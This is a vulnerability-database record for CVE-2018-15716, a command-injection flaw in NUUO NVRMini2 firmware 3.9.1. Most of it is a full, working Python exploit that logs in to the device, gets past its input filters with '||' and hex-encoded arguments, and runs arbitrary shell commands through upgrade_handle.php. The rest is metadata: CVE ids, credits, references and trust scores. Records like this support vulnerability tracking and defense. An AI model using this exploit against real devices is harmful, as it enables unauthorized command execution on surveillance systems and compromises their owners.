ID
VAR-E-201812-0167
CVE
| cve_id: | CVE-2018-15716 | Trust: 1.5 |
| cve_id: | CVE-2018-14933 | Trust: 0.5 |
EDB ID
45948
TITLE
NUUO NVRMini2 3.9.1 - (Authenticated) Command Injection - PHP webapps Exploit
Trust: 0.6
DESCRIPTION
NUUO NVRMini2 3.9.1 - (Authenticated) Command Injection. CVE-2018-15716 . webapps exploit for PHP platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | nuuo | model: | nvrmini2 | scope: | eq | version: | 3.9.1 | Trust: 2.7 |
| vendor: | nuuo | model: | nvrmini upgrade handle.php remote | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
# Exploit Title: NUUO NVRMini2 Authenticated Command Injection
# Date: December 3, 2018
# Exploit Author: Artem Metla
# Vendor Homepage: https://www.nuuo.com/ProductNode.php?node=2#
# Version: 3.9.1
# Tested on: NUUO NVRMini2 with firmware 3.9.1
# CVE : CVE-2018-15716
# Advisory: https://www.tenable.com/security/research/tra-2018-41
import argparse
import requests
import urllib.parse
import binascii
import http.cookiejar as cookielib
import re
def run(target, username, password, command):
""" Authenticate us and execute exploitation """
# Step 1. Authentication
payload = {'language':'en', 'user':username, 'pass':password,
'submit':'Login'}
r = requests.post(urllib.parse.urljoin(target, 'login.php'),
data=payload, verify=False, allow_redirects=False)
jar = r.cookies
# Step 2. Prepare a payload
# We're bypassing 2 filters:
# 1) Instead of using ";" we can try || or &&, to bypass:
# if(strpos($uploaddir, ';') !== false)
# {
# die('[1]Not a valid path.');
# }
# 2) To bypass this:
# $cmd = "sed -i 's/".str_replace('/', '\/',
$current_dir)."/".str_replace('/', '\/', $tmp_upload_dir)."/g'
".PHP_CINF_PATH;
# we have to HEX encode a payload
#
# Simple example of payload that we're trying to achieve: '||ls`echo
-e "\\x20\\x2f"`||' to execue: ls /
# 3) Multiple parameters commands are not supported yet, but the same
techique could be used for them
# Primitive Bash command parser
splitted_command = [command]
for i in range(0, len(command)-1):
if command[i] == " " and command[i+1] != "-":
splitted_command = [command[:i], command[i+1:]]
break
# Encoding a payload
if len(splitted_command) == 2:
payload = "".join('\\\\x%s' %
binascii.hexlify(char.encode('ascii')).decode("utf-8") for char in
splitted_command[1])
exploit = '\'||%s `echo -e "%s"`||\'' % (splitted_command[0],
payload)
print("Exploit: %s" % exploit)
else:
exploit = '\'||%s||\'' % (splitted_command[0])
print("Exploit: %s" % exploit)
# Step 3. Send a payload
payload = {'cmd':'writeuploaddir', 'uploaddir':exploit}
r = requests.get(urllib.parse.urljoin(target, 'upgrade_handle.php'),
params=payload, verify=False, cookies=jar)
# Step 4. Output processing to grab only needed output
res = re.search('upload_tmp_dir=([^<>]*)<br />', str(r.content))
if res:
print(res.group(1).replace('\\n', '\n'))
def main():
""" Parse command line arguments and start exploit """
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="Examples: %(prog)s -t http://192.168.0.1/ -u username
-p password -c whoami")
# Adds arguments to help menu
parser.add_argument("-h", action="help", help="Print this help message
then exit")
parser.add_argument("-t", dest="target", required="yes", help="Target
URL address like: https://localhost:443/")
parser.add_argument("-u", dest="username", required="yes",
help="Username to authenticate")
parser.add_argument("-p", dest="password", required="yes",
help="Password to authenticate")
parser.add_argument("-c", dest="command", required="yes", help="Shell
command to execute")
# Assigns the arguments to various variables
args = parser.parse_args()
run(args.target, args.username, args.password, args.command)
#
# Main
#
if __name__ == "__main__":
main()
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
(Authenticated) Command Injection
Trust: 1.0
TAGS
| tag: | exploit | Trust: 1.0 |
| tag: | Command Injection | Trust: 1.0 |
| tag: | web | Trust: 0.5 |
| tag: | php | Trust: 0.5 |
CREDITS
Artem Metla
Trust: 0.6
EXTERNAL IDS
| db: | TENABLE | id: | TRA-2018-41 | Trust: 3.2 |
| db: | EXPLOIT-DB | id: | 45948 | Trust: 1.6 |
| db: | NVD | id: | CVE-2018-15716 | Trust: 1.5 |
| db: | 0DAYTODAY | id: | 31736 | Trust: 0.6 |
| db: | EDBNET | id: | 100475 | Trust: 0.6 |
| db: | EDBNET | id: | 100428 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 150624 | Trust: 0.5 |
| db: | NVD | id: | CVE-2018-14933 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 151573 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2018-15716 | Trust: 1.5 |
| url: | https://0day.today/exploits/31736 | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/45948/ | Trust: 0.6 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2018-14933 | Trust: 0.5 |
SOURCES
| db: | PACKETSTORM | id: | 150624 |
| db: | PACKETSTORM | id: | 151573 |
| db: | EXPLOIT-DB | id: | 45948 |
| db: | EDBNET | id: | 100475 |
| db: | EDBNET | id: | 100428 |
LAST UPDATE DATE
2022-07-27T09:24:09.047000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 150624 | date: | 2018-12-05T09:02:22 |
| db: | PACKETSTORM | id: | 151573 | date: | 2019-02-07T16:40:36 |
| db: | EXPLOIT-DB | id: | 45948 | date: | 2018-12-04T00:00:00 |
| db: | EDBNET | id: | 100475 | date: | 2018-12-12T00:00:00 |
| db: | EDBNET | id: | 100428 | date: | 2018-12-08T00:00:00 |